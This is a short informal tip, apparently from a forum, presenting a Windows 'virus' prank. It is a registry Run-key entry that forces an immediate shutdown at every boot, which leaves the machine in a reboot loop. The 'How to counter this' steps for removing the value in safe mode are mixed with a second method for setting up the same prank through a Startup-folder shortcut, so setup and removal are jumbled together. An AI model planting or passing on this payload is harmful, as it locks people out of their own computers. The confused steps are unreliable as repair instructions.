[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"
How to counter this
- Start windows in safe mode
- Open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- Remove the string value named VIRUS
- Restart you computer.
- Go to c:/windows/system32(This tricks works only in windows 7 and below)
- Search for shutdown and copy as shortcut to c:/users/username/startup/(paste as shortcut)
- Restart pc to find whether its working or not
- Simply delete the shortcut in startup folder by starting windows in safe mode